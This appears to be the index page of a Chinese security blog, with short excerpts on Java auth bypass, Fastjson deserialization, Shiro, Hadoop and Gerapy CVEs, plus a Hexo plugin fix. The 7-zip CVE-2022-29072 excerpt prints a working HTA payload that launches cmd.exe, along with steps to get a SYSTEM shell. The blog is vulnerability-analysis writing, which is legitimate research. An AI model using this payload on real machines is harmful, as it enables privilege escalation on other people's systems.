Java线程复用导致的认证绕过

发表于 2025-04-30 更新于 2025-07-29
本文字数： 31 阅读时长 ≈ 1 分钟

线程池复用TreadLocal

静态变量未同步

缓存处理不当

tomcat rce

异步操作处理不当

nacos rce

解决hexo-next主题上游仓库改变告警

发表于 2025-04-14 更新于 2025-07-29 分类于 bug修复， tips
本文字数： 167 阅读时长 ≈ 1 分钟

找到安装的hexo-next-title hexo-next-share hexo-next-exif hexo-next-utteranc等插件的安装目录在其目录下找到node_modules目录
观察是否存在 next-util 目录，若存在打开该目录中的index.js进行修改
注释调添加的before_generate过滤器

'use strict';

const yaml = require('js-yaml');
const fs = require('fs');
const path = require('path');
const { merge } = require('lodash');

module.exports = function(hexo, pluginDir) {
  hexo.extend.filter.register('before_generate', function err() {
    //hexo.log.warn(`The upstream repository of theme NexT has been changed.`);
    //hexo.log.warn(`For more information: https://github.com/next-theme/hexo-theme-next`);
    //hexo.log.warn(`Documentation: https://theme-next.js.org`);
  });
  this.hexo = hexo;
  this.pluginDir = pluginDir;
  this.getFilePath = function(file) {
    return this.pluginDir ? path.resolve(this.pluginDir, file) : file;
  };
  this.getFileContent = function(file) {
    return fs.readFileSync(this.getFilePath(file), 'utf8');
  };
  this.defaultConfigFile = function(key, file) {
    const defaultConfig = file ? yaml.safeLoad(this.getFileContent(file)) : {};
    this.hexo.config[key] = merge(defaultConfig[key], this.hexo.theme.config[key], this.hexo.config[key]);
    return this.hexo.config[key];
  };
};

7-zip权限提升漏洞【CVE-2022-29072】

发表于 2025-04-14 更新于 2025-07-29 分类于漏洞分析
本文字数： 126 阅读时长 ≈ 1 分钟

这玩意儿很简单，原理不清楚，不过7-zip官方并不承认这个漏洞，他们说这个洞是微软的锅，不过我看也确实是。

<html>
<head>
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
<head>
<html>

找个文本文件把上面的内容写进去，然后讲后缀名改为7z。然后讲这个文件拖动到7zip的helper窗口中就会弹出DOS窗口，查看当前权限可以看到为system权限

Apache Shiro RegExPatternMatcher 认证绕过【CVE-2022-32532】

发表于 2025-04-14 更新于 2025-07-29 分类于漏洞分析
本文字数： 172 阅读时长 ≈ 1 分钟

本文简要介绍了 CVE-2022-32532 的漏洞成因

阅读全文 »

Fastjson反序列化漏洞TemplateImpl利用链条跟踪与分析

发表于 2025-04-14 更新于 2025-07-29 分类于漏洞分析
本文字数： 3.7k 阅读时长 ≈ 13 分钟

@TOC

我们知道Fastjson在进行序列化的时候会调用当前类的所有getter方法去获取所有public成员变量的值，像这样：

package com.armandhe.javabase;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.serializer.SerializerFeature;

public class FastjsonTest {
    public static void main(String[] args) {
        FastjsonUnserilizeTest fastjsonUnserilizeTest = new FastjsonUnserilizeTest();
//        fastjsonUnserilizeTest.setAge(20);
//        fastjsonUnserilizeTest.setName("armandhenewpy");
        String s = JSON.toJSONString(fastjsonUnserilizeTest, SerializerFeature.WriteClassName);
        System.out.println(s);
//        String s1 = "{\"@type\":\"com.armandhe.javabase.FastjsonUnserilizeTest\",\"age\":20,\"name\":\"armandhenewpy\"}";
//        JSONObject jsonObject = JSON.parseObject(s1);
//        System.out.println(jsonObject);
    }
}

阅读全文 »

Fastjson反序列化漏洞原理分析及复现

发表于 2025-04-14 更新于 2025-07-29 分类于漏洞分析
本文字数： 2.5k 阅读时长 ≈ 9 分钟

本文介绍了 Fastjson反序列化漏洞原理分析及复现

阅读全文 »

Gerapy clone 后台远程命令执行漏洞【CVE-2021-32849】

发表于 2025-04-14 更新于 2025-07-29 分类于漏洞分析
本文字数： 572 阅读时长 ≈ 2 分钟

@[TOC](Gerapy clone 后台远程命令执行漏洞【CVE-2021-32849】)

该漏洞的利用需要授权，虽然危害较大，但是感觉还是比较鸡肋的。
项目地址：Gerapy
该漏洞出现在项目的gerapy/server/core/views.py中的project_clone函数中：

阅读全文 »

Hadoop Yarn RPC 未授权远程代码执行漏洞复现

发表于 2025-04-14 更新于 2025-07-29 分类于漏洞分析
本文字数： 19 阅读时长 ≈ 1 分钟

本文介绍了 Hadoop Yarn RPC 未授权远程代码执行漏洞

阅读全文 »

Hadoop 任意文件写入【CVE-2022-26612】

发表于 2025-04-14 更新于 2025-07-29 分类于漏洞分析
本文字数： 974 阅读时长 ≈ 4 分钟

来源

https://securitylab.github.com/advisories/GHSL-2022-012_Apache_Hadoop/

这个洞吧，你以为很厉害吧其实在我目前掌握的情况来看啥也不是，说要有hadoop环境吧，后来发现根本不需要，还浪费我好多时间在windows上安装hadoop踩坑。

阅读全文 »

JAVA动态代理代码梳理

发表于 2025-04-14 更新于 2025-07-29 分类于代码审计， Java
本文字数： 1.1k 阅读时长 ≈ 4 分钟

当我们要为我们的代码附加别的功能的时候，我们往往写一个代理类来实现对当前类的封装，该代理类不实现具体的代码逻辑，只是提供了额外的功能，但如果我有很多的类需要封装一样的功能，那么我就得写很多的代理类，这种方式耗时严重且不易维护，是极为不可取的。所以JAVA为我们提供了动态代理的方式来一劳永逸，貌似大名鼎鼎的AOP就是通过动态代理的方式实现的，那我们来写一个动态代理的例子。

阅读全文 »